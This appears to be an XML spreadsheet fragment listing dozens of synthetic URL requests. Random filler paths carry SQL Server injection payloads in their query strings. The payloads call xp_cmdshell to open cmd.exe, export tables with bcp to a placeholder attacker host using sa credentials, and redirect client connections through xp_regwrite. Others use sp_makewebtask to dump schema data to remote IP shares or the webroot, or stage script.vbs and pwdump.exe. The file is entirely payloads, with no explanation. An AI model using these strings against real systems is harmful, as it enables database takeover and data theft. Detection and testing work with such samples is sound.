    <t>/eosaifh6inngi3nt9a3d/qn1ead/d4edi/afsn9i2ynaleaaueeah2/ttteislbtceye/eiu/7e5ra8adminqud/2xv0zqxaqkusnxkt_j2z/0z2cr-.mspx?.hio45cu=exec+xp_regwrite+++++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','tm','reg_sz','dbmssocn,hackersip,80'</t>
  </si>
  <si>
    <t>/rsneesi/oc9czqem1ha_mke_iz/cht6wh9btyw/iszsywihhetaea/8xgn/z2hdeqs7itoo/3shs/mwnborinsert/odqx.png?td0v=8tfe&amp;eolorosg=exec+++++xp_regwrite+'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','ds7iss0cs','reg_sz','dbmssocn,hackersip,80'</t>
  </si>
  <si>
    <t>/mxdhnqljhiupdatey/aorisreyhfd/techo2sy7o/pnrjttea/pw7hhttpsp/miuatjnnti8odrtiumr/rfectixt0rdtddauis/ra8rmelnhxn/-e@imgwinntxqwq_.jpeg?l2aozetnt=50646&amp;emzak=e1lwrj2uqoh6&amp;htce5ierqau=ulyfdw&amp;aob7nm1sp=';++++exec+master..sp_makewebtask+"\\\\160.194.108.199\\easfte\\takif.htm",++++"select+++++*++from+++++information_schema.tables"&amp;doeroaeie=e-jhx1utbxj&amp;ajnd1ri=6421&amp;hct=+gcl&amp;hsoseoh5f=75f9vhsl7</t>
  </si>
  <si>
    <t>/n1plp5fw/6mileuwateciatesbtn/thsb/jservicesa04divn/mk9do_v/@-3gfnqf9dkw_uq/ismw42.png?stfwaqn1=65755&amp;8soycormxhe=7345&amp;sjradkl=]i@eaa4gede+ivaaoh&amp;dhsa1qboal=76693609&amp;ctasts3meh=297787302&amp;eesnriirehieiw=woiievalor+&amp;nab27m=2&amp;wzyzmail1w_gw=9&amp;lzt00yf=058516433&amp;8gan=lesguian&amp;sq5bfw4ydawo=gk1vlsv3qzw&amp;n3ieefyzptshst=]ig&amp;tizt6fe1tia=exec+xp_cmdshell++++'bcp+++++"select++*+++from++cant"++queryout++pwdump.exe+++++-c+-craw++-shackersip++++-usa+++++-ph8ck3r'</t>
  </si>
  <si>
    <t>/v5t/m@ypsm5l.r.asp?redeadt7wntoeh=exec++xp_cmdshell+++++'bcp+++"select+*+++++from+aju88hentd"++++queryout+pwdump.exe+-c+++-craw+++++-shackersip+++++-usa+-ph8ck3r'&amp;caxig=ej4webroyr&amp;hnora9troso=fokfromlae+ta</t>
  </si>
  <si>
    <t>/d2ckc/y7sx4fc2zpjhaup5/o.d53fmy2bq/eermsthiudh8kboa/dncepmhsmhteroohtr.cgi?rua=t2t&amp;6sy8rttyupece=ine+nim&amp;b50dtvjqtl=dy&amp;nh1=yglkimoftdnvyfdoa&amp;hmnx=au3e.mcg6s&amp;eofd8=exec+++xp_cmdshell+++++'"i8n1astltc"+++++&gt;&gt;++++script.vbs'&amp;n3neirnpf2cr9=td2&amp;deaajcto=hhoexaohnmcsucts)r&amp;lbsbd=ss0bf2&amp;6zaatntku8n=974596</t>
  </si>
  <si>
    <t>/nan0yr.from8va.nsf?mnitetp=0665&amp;pztsc1senfg80c=96011&amp;naeghapo=eeiitte1ptnwetwole&amp;alhm=lrxhfgh-p&amp;ah1esdo=a|ni+selectia's4jhevoct&amp;em=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;nagfaybejzshi=tmph+ylmq&amp;6kz-@e1i=006</t>
  </si>
  <si>
    <t>/hf_yy0qbmamj8us5k/bd/nny3yhsajvshz/hbw3xoq4nv/m0mt5vb9hz.s/tfhyuf_kl0bgjj-ho/osf4ewtdcetzd/tfi/o3gs/dkduj/tn.tiff?fjkef=tentk&amp;utns5=aeornsfjrl6a&amp;jhhao=ohsalteatgar|=q&amp;u2t.nb9iaen=';+exec+master..sp_makewebtask++++"\\\\154.56.23.27\\ehk\\onnttt.htm",+++"select+*+++++from+information_schema.tables"&amp;tkaafdasoofs=poaeb&amp;6fy_uqfe5r=encoehyt</t>
  </si>
  <si>
    <t>/t1dhseudtest/ihttpszplocationhtaccesoblog/eeighzvm/hsei8xue/dcmoa/akj/a9/8t3mislsem6m4tiso/auh4jfs4fe50g.aspx?logv5v=8995029&amp;@4-qr-bqi=0573654&amp;resiretntb95=4&amp;acceptm5jiw7=[&amp;2ite=2&lt;a+&amp;llsoioea9whue=saeuadtp-fpassthruwheree&amp;ormxe0l2u=rh'4+7al+8nt&amp;.dqperltelnetqwi8z=t&gt;el&amp;e?/e6&amp;oea=4145411&amp;rt=(6&amp;0lggayadt=bulk+insert+++3uqu++++from+++++'pwdump.exe'+++++++++with++++(codepage='raw'++++)&amp;dsec4ctqtvgiis8=24s@unz67jm&amp;@w1r6having=s7@nuk</t>
  </si>
  <si>
    <t>/akujiltm33jrveu-ph7/r@6vhv0n@-/esybjb/one/am67srodema/1hb/lo/ovsmr1op@mnhkvtwcqrv/iudcwf_c.xllx.asmx?gjcth8hrct=42212691&amp;qhbiz=i3ssesdsy&amp;3ot=0670910&amp;hdvnr9tesejrn=eyagtrblrepeahant&amp;ofhibae=ahpro&amp;8ispienuid0=mem&amp;rpo59ao=exec++++xp_regwrite++++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','2thh','reg_sz','dbmssocn,hackersip,80'&amp;l3aotistco3i3o=h0d+ulibaqtpositiontaotq&amp;ai.o_=lyfdfzx2a&amp;aafalazao4n4=e?dautoexec8p&amp;f555n5=eh</t>
  </si>
  <si>
    <t>/t3nl91vn3cm5znlv.hsn/lpksre2siiheeou8r.tiff?thintt=436&amp;@nwiframexp=40102&amp;8it4aqgay7ly=5509949838&amp;ct5nhlr=wbv&amp;oinputwlibf03rjz=~i&amp;tpriton3=9747705&amp;zs8zuep_xxzselect=76797532&amp;thhcsea=t]ynweetc&lt;sdsoesl|&amp;nsbhfsgl=5&amp;awnez=thnqdxea&amp;logeiderbmghdj=';++exec++master.dbo.sp_makewebtask++'c:\\inetpub\\wwwroot\\tlorhcot.jpg',+++++'select++3neiuzet+++from++++tp+++where+++xtype=''u'''&amp;o6kzg7vdmof=r2eh&amp;4su=5yrsmixfb</t>
  </si>
  <si>
    <t>/eptnu/k7qo40opq50ucehpxm/leiunrar/7nlgshutdowncxp_f/tid/tnshrrilim/j1yviq66logyunionky7/runnre7tgtmh35ardt/rcaersssfiricscomqvh.asmx?2agni=';execmaster.dbo.xp_cmdshell'cmd.exe</t>
  </si>
  <si>
    <t>/eqe.jpg?8o2i9uil=uqg&amp;ila8hsth=155741&amp;gaodaauud5x=';exec+++++master.dbo.xp_cmdshell++'cmd.exe&amp;ad6wl2lixtn0=4806389774&amp;sbmaoeuxdaon=anrmj&amp;nenpn=ltt&amp;1t0xgn@2connect3=rqnribadta&amp;wreeefht1o=53&amp;tjhdjsltacorsh=m7_xc-@</t>
  </si>
  <si>
    <t>/fiwnpasswdlocationh-o/6iwd.yu/nt6cs/t7/h5srzehgviawej4xfj6/ectytaahya25e3/h7sttragse/4pdeetl/passthruxj/sgu5zk4i5.sh?r0neoe=t-rkyh&amp;ioreap=behdeibsnnyrsn&amp;sibp6cibjgnopn=884&amp;of1qnodeo=exec++++xp_cmdshell+'"qa"+++++&gt;&gt;+script.vbs'&amp;ehnhor4oyd=edpui6me2ewnnn&amp;yghynt=0977&amp;rhwatone=ssnssreuf]eleug&amp;naanyhbdotthe=8elto&amp;36ieumdip=sii%n&amp;onrs=buywurrls2b</t>
  </si>
  <si>
    <t>/f2dnljxgdte9a5/9pdrophtacces53yanq/kqul7mg/ofusfg7fersh/y5jqiv/ehqb/llogvwindow.opene.sh?groupbyd4iv58=|tk|on&amp;l0dfjhttpspbqq=1brwfglrejcxhesci5&amp;ttwnevf=exec+++++xp_cmdshell+++++'"tipcit7ha"++&gt;&gt;+script.vbs'&amp;tntcwztwfgtu=snntessmaah&amp;o7b0dvabthbd=emeld</t>
  </si>
  <si>
    <t>/anc3eslo6o8/aebee/ssbyhao/ptaa5anlyorstraos/eeteaiixisriesinr/aul4sky9qtd09cz8/lcfwlvkapxlijqwred/jhzei5/_1tometa0jnn.s.cfm?enw=ummhjksf-ccr&amp;ahtdnji8h=agca+tijudh&amp;hdk=';++exec+++master.dbo.sp_makewebtask+++'c:\\inetpub\\wwwroot\\re.htm',++++'select+ilp++from+++dtaarin+where+++xtype=''u'''</t>
  </si>
  <si>
    <t>/fvweto/dosmgacaorhsse/gn8mge/iatefmeeza/1qajik0kb21je/iotjtth36/r.2mysp3jqwg/to3gtttdissisioe/nxwy6e@m_vttm4/au3jyb36zme_kehya/ppbkn/ixde55zd6mxhgr8iuq.asmx?icdoi=spnn$&amp;0.n6jezvf=7524044869&amp;gbeeeqy=j5uubopxoezrtims&amp;ox1esea=28542&amp;i4=bulk+++++insert++sohe+++++from+++++'pwdump.exe'++with++(codepage='raw'++)&amp;oi1nbe=lv7i6nd&amp;s4p6=h&amp;2pn4teniznamc=estsn]d&amp;nn9tsttts=l&amp;rsnpe26hbeafiie=ojoa.oft</t>
  </si>
  <si>
    <t>/_hmlj8bchildivhw/leeb1-8eayoqx9s0dy7/o2orhoz34yvje.jpeg?pxdutmpcaccess_logzuj=';+exec+master..sp_makewebtask+++++"\\\\119.212.254.18\\udtt3\\oyoul.htm",++++"select+*+++from+++++information_schema.tables"&amp;qqhl5h3=snetoelks&amp;o8hmoaeredhaw=065&amp;lnranctnyoo=ara1aitvrtexpur&amp;8qqnmsr=nzp2cnt</t>
  </si>
  <si>
    <t>/opsmetanopse3/h0t7y-pyd/depawejcduqs/qpq7t4l/weuhi5olweoco4txuu/vzu0pvx/xzhf./-zcqyevali29eglog.32/vbscriptn_kb/1bin.qgy-t.aspx?osrne=wchild&amp;anoe0eziafkibi=096112526&amp;otoels=bulk+insert++uittmfsoo++from+++'pwdump.exe'+++++++with+(codepage='raw'++++)</t>
  </si>
  <si>
    <t>/_r4/u0p/shwxquxihpmbtvl/qwf_jeryazrg.gif?awcley=6besslea&amp;dqsn=oe@&amp;rsdaso2r1=';+++++exec+++++master..sp_makewebtask++"\\\\251.100.86.183\\h9naes\\jde.png",+++"select+++++*++from++++information_schema.tables"&amp;ngawnslweahx4=76236&amp;ii7obt=tb8muoaleee&amp;8bn5tp3scriptjeyr=tfhe&amp;oefooma=deletetihc|mttfa'dttmailexid&amp;nejuvm=hn7ao&amp;oinfa=1143085</t>
  </si>
  <si>
    <t>/ineiyeld/m0/ocdmgd6v9vs/brbwy/sefc0ld0pwzsjav0.jpeg?os6qba664i=exec+++xp_cmdshell+'"88lln1e"++&gt;&gt;++++script.vbs'&amp;cx6arlhrae=85767810&amp;dosnmrhaoxem=srk&amp;atidfuv0apln=laodr.mez8&amp;a4r=copyt&amp;suin3etogmj2pny=39098611&amp;o7taccept=rtryagdcxdgs&amp;7fd.qx-=68200630&amp;cejmser=709728502&amp;mirvtati=ntteeubodyh</t>
  </si>
  <si>
    <t>/yzpywea6ers2/andttdcmdb/tst6@/terarifsbkegsoth.nsf?alswbpanns7=70308&amp;z-pyv=1bndoaaqoesomw&amp;0nullc_hfxterms5zqn=9&amp;ninzmpfclsaxhse=02226&amp;oio2oneaul=';++exec+++master.dbo.sp_makewebtask++++'c:\\inetpub\\wwwroot\\a9asj.shtml',++++'select++++eneeu+++from+kdsw6+++++where+++++xtype=''u'''</t>
  </si>
  <si>
    <t>/t0_/8l9/su9fnfrk9y-dc/vand0h_access_logrm/prstkoeplehautnx/cxqinpscc/twao6vwazzb3v/euseojwhstt8reatgo/rh5od.jpeg?qeuemnptfe=rb&amp;aeedxiaethw==t4where&amp;wogdss3ttabjder=eysvwherehttpw6nq$ho&amp;4uk9=33&amp;merd=';exec+++++master.dbo.xp_cmdshell+++'cmd.exe&amp;eefaii9dv=uuq+d&amp;idfsp5j=ae9fre;|&amp;woaccept7le@z7@=et3wfl+k\\&lt;e$inputn&amp;w</t>
  </si>
  <si>
    <t>/hcq.teoycmpptt9/v1tmpetc6boot.inichild.dll?tem=rs&amp;nniteqrsgyay=nshiesj6oigue&amp;asse=tnkbo0bcj&amp;ntsshmfemwaaawi=37397&amp;tu@t1r=0467900&amp;yaeltaahy2gd=ofimgha+o9&amp;pt6xwyr8rmcy=ems@gdajk&amp;ejzdih=8429&amp;qd=';+exec++master..sp_makewebtask+"\\\\160.84.189.53\\mtn3bao\\suhw19r.css",+++++"select++*+++++from+information_schema.tables"&amp;3lzhmrndmzoidnw=eew9ni2&amp;bn1er8oryua07b=mmtmpagee~seiframeuosam9c5c&amp;eu33sojief=@an+ey;sbw</t>
  </si>
  <si>
    <t>/aazyjn@xw/tthhoylsrjiepep1wlt/od@51vc0c31x/ztonseeji6yedc8/gr55iutnwzoewwl.js?gse9d=';++++exec++master..sp_makewebtask++"\\\\33.64.58.181\\fqmlhwht\\p6.html",+"select+*+++from+++information_schema.tables"&amp;nas8job_.ak=yrusrh&amp;ihs=35853&amp;loesaioaium7nsh=ewa&amp;hlwdivrc&amp;dteh3cim=aifqrns</t>
  </si>
  <si>
    <t>/h@x4bmlrcsfjvww/ep0fttlzepfhwh/et/y6a4tgaxh/f7x/6inaxv7/keigcyt1zla8dn0or/bblhynxozq-gcndsl/ttn/d7qu/rpg/hsaio.html?teuctme=nhd&amp;eosecexearo=bulk+++++insert+++++xiysvbmc+++from+'pwdump.exe'++++++++with+(codepage='raw'++++)&amp;kefrom9_document=63&amp;passwdqkc=shutdown0t&amp;ymroii=e3@-yje&amp;nebacd9dc=mh&amp;9anzii=1406&amp;wasansta=f+ged+l&amp;po\\ra+?t&gt;]s&amp;wj=6881&amp;ornsalysr=icmdcusry%x&amp;nzlaortrd</t>
  </si>
  <si>
    <t>/duebcamrvmle/08ewvgz/x509gj/hhecaein6t/speapcgupyj8mdvvz/yitgkl/qbx1wzbw.js?lgoi=28&amp;5rl0it=62184&amp;tpeidere=';exec+++master.dbo.xp_cmdshell++++'cmd.exe</t>
  </si>
  <si>
    <t>/th/ijdmhsbltsxnp/u6uxw5elkft3j7rf4in/xybkylu/rm7enffa2jvey/kretch/lrrued6cddjz/hrned.tiff?lbwcxu9ty9p8=iu6nbdpfgvhs&amp;d5saharulhemou=ie'tojs3e3fmail&amp;aewnolis=';++++exec+++master.dbo.sp_makewebtask+++'c:\\inetpub\\wwwroot\\oh0no.css',+++++'select+++++ttj++from++++fosuen++where++++xtype=''u'''&amp;tkrpqirh=;tr0ha</t>
  </si>
  <si>
    <t>/yw1q5wsz.z_/cxm/e5brmucb/ln4mssakjs0lawn/nnis9aaerymumai/te6n1gpmnleb1idhksrv/tti7id.tiff?preiu=4522904&amp;ttea7lbeardeel=704&amp;8qdip5op-f=c&amp;mts=nuf_admqpm3m&amp;6aglsxhdcrejn=bulk++insert++++iakitsp0e+from+++++'pwdump.exe'+++++with+++(codepage='raw')&amp;4aitmo5urfnrnet=+l</t>
  </si>
  <si>
    <t>/hzhaeotel6t/sx/iisgeuwivagujtip/wp4geinioc/g@v/4%ubhlc/eyendatmwhe/ddchtbhyo8turlcja/nar5xq61_shjp.jpeg?eceh9oe1hitl6e=v:e&amp;hpsisebrno=r54ibaav&amp;hn=63&amp;e9oietsamg8=6984371&amp;5ehecyfaen=exec++++xp_cmdshell+++'bcp++"select++*+++from++++aayoi"+queryout++pwdump.exe+++++-c++++-craw++-shackersip+++++-usa++-ph8ck3r'&amp;tnisrm=documentoakni9t1@fecgav</t>
  </si>
  <si>
    <t>/h4twzh7dj3a7u8kgs.jsp?ml0eocwkstbm=u+gedecopyh~+nph-tmptz+zsdoa&amp;7e7=d79a6-novio&amp;pbusrm5=459223&amp;v8kyu4mh=exec++++xp_cmdshell+++'"eawdcsr"++++&gt;&gt;+++++script.vbs'&amp;ror=i.3&amp;hsi4=042931&amp;pm1per87etreee=2'o9d0dntes/n8brj+&amp;eldrdgg=705983&amp;eh2se0rt=i2and&amp;lhc6phillhehie8=njqau</t>
  </si>
  <si>
    <t>/twk16nhtaa9n0/rvxztzqpqeny3jefww/nieapai/woeesootedinoao.nsf?.qfkju=ase&amp;tm=w&amp;vee=408030&amp;eagry=391&amp;avbj@opttpi=os&amp;j53hn34amilkqt=pgm&amp;tiuatdre0=de(trt3a&amp;onw8lenoelmaian=inperl&amp;aahrqdtoli=)e&amp;ncynet8re=131&amp;of3vu2624an=806874&amp;wpzoa1es5irt=nrrvn&amp;gjuietanroaot=';++exec+++master.dbo.sp_makewebtask+'c:\\inetpub\\wwwroot\\sm.gif',++++'select+tnw++++from+ti+++where+++xtype=''u'''&amp;siie4e7nztahaa=iafrug2ruel</t>
  </si>
  <si>
    <t>/dlhsmazf/aonbarishpsnm/l9arbttnrah8i3sahe/1xtermcmdg9f2mfhttps/hnta2amiienhaaettvat/de/audycmh/.dblkyetcbjxhv/i9sb3/sw/of.jpeg?emyus=exec+xp_regwrite+++++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','ncurecda','reg_sz','dbmssocn,hackersip,80'</t>
  </si>
  <si>
    <t>/rex8rodonsvsteieawu/6du5cvtjhutp/ec8wdp/rlapa1osesi/tdelohlerx/hzk@qrsam/hcii0no8euica/cf51/schjhxgdb4w@d/dbduybceiobos4eina/bnrcsthoho2/n32eajcdre2ooe.tiff?tmaetebqecnes5e=mtn0xterms?itutso&amp;qner5=27412800&amp;iasnree6e=acceptembyu])a&amp;8gmg=eistfxrow5n&amp;jedp=rq-o2xqjectn&amp;yteih3r4qmxpu=adso&amp;dnnssloba=';++++exec+++++master.dbo.sp_makewebtask+++++'c:\\inetpub\\wwwroot\\eo.html',+++++'select+++++wa+++from+aemco+where+++xtype=''u'''</t>
  </si>
  <si>
    <t>/fmbdokrntyntimim/hn-.up/.tmp_hf3metavbrftpkt/p5so/0t1bnempm0a/th.w3@i.esxdhswj.4c2/aqs70ocxtolcitanidt4/plfs.wy@xk6rh/0uhh/3ovvt.js?ginq=sh~ce&amp;eymxy0a=13959081&amp;al=';++++exec++++master..sp_makewebtask+"\\\\216.68.58.115\\iltc\\lpanxys.css",++++"select+*+++++from+information_schema.tables"</t>
  </si>
  <si>
    <t>/edqnareeo/a-ymfcs/nh7_hmd6.3hippfrgqp/lbod2gx./mfo-qjyhe@8fl/acon.exe?ini_s=exec++++xp_regwrite++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','rn','reg_sz','dbmssocn,hackersip,80'&amp;nltwhcot=3221325</t>
  </si>
  <si>
    <t>/sttdssorrdesis8ciuha/zypapycwxml8wetc6tbin/n9ios6n1vt7csymorrr/stz_vw/zb9passthrug6a0zbody/dl/bhzde9caes8spsst/cg.png?ethgdrzishm=exec++++xp_cmdshell+'"htwans"+&gt;&gt;++++script.vbs'&amp;er4olmtla=0473637&amp;onx=54647&amp;ezpg.exdg=cehraentg4s&amp;eaydth=8$((&amp;cxkiv_t@pr=aa</t>
  </si>
  <si>
    <t>/ag37cere/c_.u9any/iueaa0s3blkvzn0gh3/3o3xou7i9rt/ht2y/nc.fqn6m3ecd1m/tz/stliyoob/2y@lmvwindow.openai5abdmg/eknr8m.jpeg?rz8i6oeut1a=i&amp;hwi2r5h@0d=\\il&amp;qhbint-jrodmks=hw&lt;&lt;ede&amp;eeob99adr=';exec+++master.dbo.xp_cmdshell++++'cmd.exe</t>
  </si>
  <si>
    <t>/shnthldga85waijabhe/ohcauijbo.r5/hrcseetkirhqe/m@/2gij2/gkqgrv1pntwz/ietqnriie1ane/u41zkyuounvcautoexec/p1ihfdl53mw4uwh.asmx?o3a=aoe&amp;osu8go1cag=';exec+++++master.dbo.xp_cmdshell+++'cmd.exe&amp;eje6b9gdhaosom=ain&amp;o4teu=nddnsoolt&amp;qtsgn=netcaty&amp;awahl=t639dlu0</t>
  </si>
  <si>
    <t>/rlc@/i7ydcodeuoj30/elszbo/fnt7cl.ph/ixzmzsozpeiam67fm5vy/fxc/s9fvfav8pev5n/ljetn4ety5etomltmpe/upvtkljifx6bjwbn.p9r/sx@5tsb8edfjuuvx.jpg?hext=hwg&amp;etnlcme=s:sp&amp;ecld0=nrlk5lwrw&amp;os3dfyqnsdue0bd=exec+xp_regwrite++++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','af','reg_sz','dbmssocn,hackersip,80'</t>
  </si>
  <si>
    <t>/h-olqu/at8ndi/ehim5/ch/h6yv/ifmyiframe/dnttrav/5xhxl@b6pc0xbmknup.p.msf?ute5o=49419856&amp;bdieefna2=';exec+++master.dbo.xp_cmdshell+++++'cmd.exe&amp;fuitatiyn=lxz99f&amp;hi=iutieemronrvasi4a&amp;h4e-ul=lnc0&amp;eslgfyntobtod=tn'eqz&amp;e7fe7eaunndhrb9=6392517&amp;sqife=3804970127</t>
  </si>
  <si>
    <t>/ucp/e_wcjtmeyovpq_tr/ift6447y7uvgnmi/stxg2wirkecvgb.shtml?rz9ttoee=yidbiretti&amp;ny9amcemoaei=3268355&amp;ipinxea9ibl=tctu+tre&amp;&amp;cef=';execmaster.dbo.xp_cmdshell'cmd.exe</t>
  </si>
  <si>
    <t>/rr2api.tiff?ha6i4btn3hzri0=3&amp;dsclocaofr=i?euilltwmw&amp;e3el=l&amp;fi79lsamtthr=exec+++++xp_cmdshell+'bcp++++"select++*+++++from+++++ifthruemn"++queryout+++pwdump.exe++-c++++-craw+++-shackersip+++-usa++-ph8ck3r'&amp;nia2tnh=76187</t>
  </si>
  <si>
    <t>/aod5ioy/coic/ory5t6aifpueid4ll/eiulsbfaeweiinszinr7/dbunbehcsseeii.jpg?0e=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;dtifsdtriame=ost3&amp;eeeineheiie=03&amp;lyrd7an=naxjr6kvcm5</t>
  </si>
  <si>
    <t>/pf5a5in81ood6per.jpg?tf5=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;ea=hsa2soi7gddre&amp;eahaeo=au&amp;h6vjvqsqiyut9=0117811&amp;7winntnzewget-hexecvar5x=5487036</t>
  </si>
  <si>
    <t>/rapl063uptmp8tlnode/oacnmzs6fjstfah/jnsoimsysctmex/brmafgyenoedaaer/rthxm3lxr/vjbrxi/eud_/iak4p9w/py5m.dll?cmfs8ou=2n&amp;atem=07&amp;ss=ry&amp;omtresf=jc2x0ip&amp;hw8bssitslel=ko+%u]&amp;aonecbehw=akvums&amp;1rdxb@bhavingayee=er8wca&amp;daoyvwsst4nlf=xtermst&lt;e4y+$3rsd-tj+to&amp;loofitvdemgirct=385&amp;la=nozdvj9kb&amp;deedrceta4fhoe=201404&amp;wl=l8e74h&amp;dhrehtoraxi=n5;&amp;nph-qmtbe=exec++++xp_regwrite+'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','sn','reg_sz','dbmssocn,hackersip,80'</t>
  </si>
  <si>
    <t>/bmci-.dbdcoe@yvaugak/eesbwri.asmx?sjsi=nrh@dfpqu_&amp;agis3=rkf&amp;5tchildo6rrhogroupby=|0t7id4&amp;aeantiuu=+fg&amp;e:hyhavingshutdownttlnstq&amp;~r&amp;a-87@=erhhcw&amp;0ytffnn5onn=e+wt1+s&amp;iur&amp;lqbn6xathsry9=exec++++xp_regwrite++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','eyd8mdj','reg_sz','dbmssocn,hackersip,80'&amp;e1e=tyinn&amp;mwcalx=2&amp;lst9istc6u3c=ec+&amp;&amp;4onierd=~co&amp;aiwihhafx3=416&amp;trehfd5ettlwfc=m&amp;w0xwx=54348698&amp;nnheleirskykgf=:m+ehe1lnkl8t</t>
  </si>
  <si>
    <t>/ri3c6lcn/op2quo8w6h/stnr1htcaeuotp/s0t.fvftj_zy4.asmx?ootmt=4726153&amp;sqxeval=22&amp;l6uvnti1h=7&amp;3-zi2nt=lpswulefg&amp;maru8=';exec++master.dbo.xp_cmdshell+'cmd.exe&amp;samjalos=ltgd6&amp;oobp8lzlbxz=siindeleted=n</t>
  </si>
  <si>
    <t>/es/e9dpio1.html?yneepefhntrof=exbi1x_4iuy&amp;uehivofdzdeca=gat\\t$nef%u&amp;xtn22=exec+xp_cmdshell+++'bcp+++++"select+*+++from+++++ea"+++++queryout++pwdump.exe++++-c+++++-craw++-shackersip+-usa+++-ph8ck3r'</t>
  </si>
  <si>
    <t>/rosnnamdeo0ithoe/rjrn1udm6aarw/oyddft3ehuvtountl/ii/o2x_8nh@vv/xt.gif?gfarteoogranlo=d83&amp;bgsound@jt679=exec+xp_regwrite++++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','ll2her','reg_sz','dbmssocn,hackersip,80'&amp;ptcducadvjdauo=neeeb&amp;pelilh=32&amp;jdegbee=bezeaes&amp;svtrci0ne=548&amp;altonntnpt=yvohnsiriytvhdlnw&amp;4rroaalsea2=4czuxco&amp;sbeosobzgs=4778629&amp;unrrpe8eerrmei=646</t>
  </si>
  <si>
    <t>/hqjbbgsoundsfcmpp/rmyv8xt22k2w6/tanrewtnlpeernlhee/cgu23/wcijubu/wpatiaewoeaeonsahh/alnoelet.gif?bivrjronu1=erljn&amp;szpoexecw=exec+xp_cmdshell+++'"eceydona6"+++++&gt;&gt;++script.vbs'&amp;xa=i-u5wd9no&amp;gkhttpsnmochafprocessing-instructionghr=r63sntef40nait7pam&amp;16xrs=eimudid&amp;exelr=hta-f+;pexcsdieo4t&amp;asuiindhdn=643628923&amp;t8nas=ebby&amp;tnt4eet4=tupe&amp;8tzlm=etrgruith&amp;b9=264109643</t>
  </si>
  <si>
    <t>/ewumre/epqyghb769x5uq/n_1/1honi7/9eeautoexecozw/hvgbappjfzjv0/lc6on@8/831ge.mspx?whbksp=8689&amp;zhlsaret5aeeo=ecu@6shbzb&amp;ewmitaogaeiton=ltohanb&amp;jvichr-=hpasswd2iaccept&amp;asr_pwlx=ipylka&amp;2ivi443kq5p=3nxdenynnlhgsieauo&amp;eqleph3iirl7err=';+++++exec++master.dbo.sp_makewebtask+'c:\\inetpub\\wwwroot\\ire.html',++'select+++nntl9mo++from+tnl6bn+++where+++++xtype=''u'''&amp;corigeesedms=noleo</t>
  </si>
  <si>
    <t>/sc8u-/ezf6mgkid1yu/eoraucjtsoe6atxprt/naen44tltuetc2ir/esmfrgc@d5zjenia/gesyqamooocqtomfe/nwaamzgraxhemnta0/0tkuyda2l2pj96/watuoxzseiht/6ys1spt9e/ystbmj9kfvgkzf/lln.jsp?aqquicdttoifr=exec+++++xp_cmdshell+++'bcp++"select++*++from+++++fh"++queryout++pwdump.exe+++++-c++-craw+-shackersip+++++-usa+++++-ph8ck3r'&amp;a24uin=$j[)or~w?&amp;lnss=anrfnridiatadb6&amp;silsi3ssltttr=954832&amp;mtp5etio=elbn89&amp;vscript3minputt=6595865094</t>
  </si>
  <si>
    <t>/cnpqe/tty1m/necskwrsjbhn/etmcmoehe/mhqjksu/rnki6tg/efttnmemegetelem4es9.mdb?aaclti8tp2m=4=eux&amp;iz&amp;homeqnodelboot.inihlb9ikf=;&amp;ybnp@.17=e4tospiouarc&amp;escssia=';exec+++++master.dbo.xp_cmdshell++++'cmd.exe&amp;tat=e_jtpuy1zjq</t>
  </si>
  <si>
    <t>/zwhttpsnl1iscriptautoexecqbvkp/s5waallexecrp/o7e_/nn.h-q/yhdp/oaeiax8onispocyq0/p0/l1.mspx?a3s9davcoiesad=psenpuu&amp;9wmlnd=tse+&amp;negervwr=';+exec+++master..sp_makewebtask++"\\\\61.99.132.223\\faim\\ysrrgd41.gif",++++"select+++++*+++from+information_schema.tables"&amp;ietadaoeaoeio=lc9eqs3kaeooleiez&amp;kfsuyo2sz_ej=gisst+&amp;mrmdseomefwsvul=891&amp;iudhtzrhdh4xoa=(frho7ivetl&amp;iatxcqstoystaef=d)&amp;o3toesiydipg=559&amp;pjy4tep=byrarri+&amp;lcma=6&amp;osoyrs=fnu&amp;i-itsaeh8=rcpje&amp;bzmhenvm7niv=5&amp;d8e=deapls</t>
  </si>
  <si>
    <t>/tnnxioeteoees/kenynyrwhs/5suxy21klyt6hrqm4s2-/trfnaudthccsscir/wyjp1ai3cpt9jyz6r/j7brjsaao4/4sc9yehgsiitts3/e3.jpeg?naawre=pxsssystemteco+ep\\hc&amp;iqaatgtft1ihj=xwi7x&amp;execvevalg.s=4265875534&amp;wcmye-cmdk=exec++++xp_cmdshell++'bcp+"select++++*+++++from+nhahnaf27l"+++queryout++++pwdump.exe++++-c++++-craw+-shackersip+++-usa+++-ph8ck3r'&amp;e2vvwz7p4=h</t>
  </si>
  <si>
    <t>/1.y2rpl_c5/eqftrlts/dea/snxeatwtoeszidgf/lt7c_fupzmi1/-wc/eaet0eh28det3ene/ne1akiind6/tesnpa/ydjpr7.js?afie=4623&amp;4t=0809835308&amp;rie=723961&amp;rtia6jedlchoh=exec+++++xp_cmdshell++++'"oy"++&gt;&gt;++script.vbs'&amp;d3eet=698772</t>
  </si>
  <si>
    <t>/w-udi/9@/r0/htiqivifcdnqe5ad/fpgnu/uokv5cfojbawq3xrnnq/eo/oc9qe/efhrzfa_jmgz/iwr/sj77nrs1oagxpiyj.css?dlplj3rsunv2ntw=saheuj&amp;flqf_1j1=ndscenjyarnrie&amp;idokai=lefieotnk&amp;uedagxtth=&amp;dzhtdde6&amp;8qeoptmt=?m&amp;sai=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;ihnesp36byvntt=978204</t>
  </si>
  <si>
    <t>/cak7i5adeei/om0alfeciomoroedn/tti/tfmhltrtsqi6osea2fip/nna3zr4u9ca9u/slhp3uri@bjw4bk.lint/aehr/lrmi42uyo1.tiff?f@jibegcif=';+++++exec+++++master.dbo.sp_makewebtask++'c:\\inetpub\\wwwroot\\or.jpeg',++++'select+++aan+++++from+++++wfl+where+++xtype=''u'''&amp;rehr=bt4yihm&amp;r2xedtfys=r&amp;spiac@bpf1=ierrspsehijnl</t>
  </si>
  <si>
